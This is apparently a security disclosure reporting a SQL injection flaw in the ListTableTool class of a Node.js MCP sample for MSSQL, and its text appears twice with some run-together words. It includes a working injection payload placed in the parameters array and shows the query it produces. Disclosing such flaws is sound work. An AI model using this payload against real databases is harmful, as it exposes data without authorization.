Summary
The ListTableTool class in the Node.js MCP sample is vulnerable to SQL injection attacks due to unsanitized user input being directly interpolated into a dynamic SQL query. This affects the run() method when filtering by schemas via the parameters array.
Affected File: MssqlMcp/Node/src/tools/ListTableTool.ts
Steps to Reproduce
- Instantiate the
ListTableTool and call run() with malicious input:
{
"parameters": ["dbo'; SELECT name FROM sys.databases --"]
}
query becomes:
SELECT TABLE_SCHEMA + '.' + TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' AND TABLE_SCHEMA IN ('dbo'; SELECT name FROM sys.databases --') ORDER BY TABLE_SCHEMA, TABLE_NAME
Summary
The
ListTableToolclass in the Node.js MCP sample is vulnerable to SQL injection attacks due to unsanitized user input being directly interpolated into a dynamic SQL query. This affects therun()method when filtering by schemas via theparametersarray.Affected File: MssqlMcp/Node/src/tools/ListTableTool.ts
Steps to Reproduce
ListTableTooland callrun()with malicious input:{ "parameters": ["dbo'; SELECT name FROM sys.databases --"] }query becomes:
SELECT TABLE_SCHEMA + '.' + TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' AND TABLE_SCHEMA IN ('dbo'; SELECT name FROM sys.databases --') ORDER BY TABLE_SCHEMA, TABLE_NAME